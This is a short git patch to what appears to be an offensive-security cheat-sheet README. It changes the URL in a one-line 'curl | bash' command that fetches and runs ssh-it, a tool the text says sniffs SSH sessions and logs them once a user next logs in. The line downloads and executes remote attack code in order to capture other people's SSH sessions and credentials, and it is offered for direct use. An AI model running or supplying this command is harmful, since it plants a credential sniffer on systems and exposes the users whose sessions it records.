From d0a8e3bbbfe424996afdd535348b05a3d36b2ee9 Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Wed, 6 Sep 2023 12:23:56 +0100 Subject: [PATCH] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 246203a..0e7dc17 100644 --- a/README.md +++ b/README.md @@ -1467,7 +1467,7 @@ The SSH session will be sniffed and logged to *~/.ssh/logs/* the next time the u The easiest way is using [https://www.thc.org/ssh-it/](https://www.thc.org/ssh-it/). ```sh -bash -c "$(curl -fsSL ssh-it.thc.org/x)" +bash -c "$(curl -fsSL https://thc.org/ssh-it/x)" ``` ---